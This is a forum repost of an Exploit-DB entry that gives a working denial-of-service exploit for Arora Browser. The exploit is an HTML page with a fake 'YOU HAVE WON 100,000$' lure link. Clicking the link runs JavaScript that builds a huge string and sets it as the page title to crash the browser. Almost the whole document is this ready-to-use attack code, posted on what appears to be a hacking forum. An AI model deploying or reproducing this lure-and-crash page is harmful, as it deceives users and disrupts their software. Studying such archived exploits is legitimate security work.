Exploit Arora Browser - Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
37518
Проверка EDB
  1. Пройдено
Автор
T3RM!N4T0R
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2012-07-18
Arora Browser - Remote Denial of Service
HTML:
source: https://www.securityfocus.com/bid/54599/info

Arora Browser is prone to a remote denial-of-service vulnerability.

Attackers can exploit these issues to crash an application, which causes a denial-of-service condition. 

<html>
<head>
<title>Arora Browser Remote Denial of Service </title>
<body bgcolor="Grey">
<script type="text/javascript">
function loxians() {
    var buffer = "";
    for (var i = 0; i < 8000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 8000; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2><a href="javascript:loxians();">YOU HAVE WON 100,000$ ! CLICK HERE!!</a></font></h2>
</body>
</html>
 
Источник
www.exploit-db.com

Похожие темы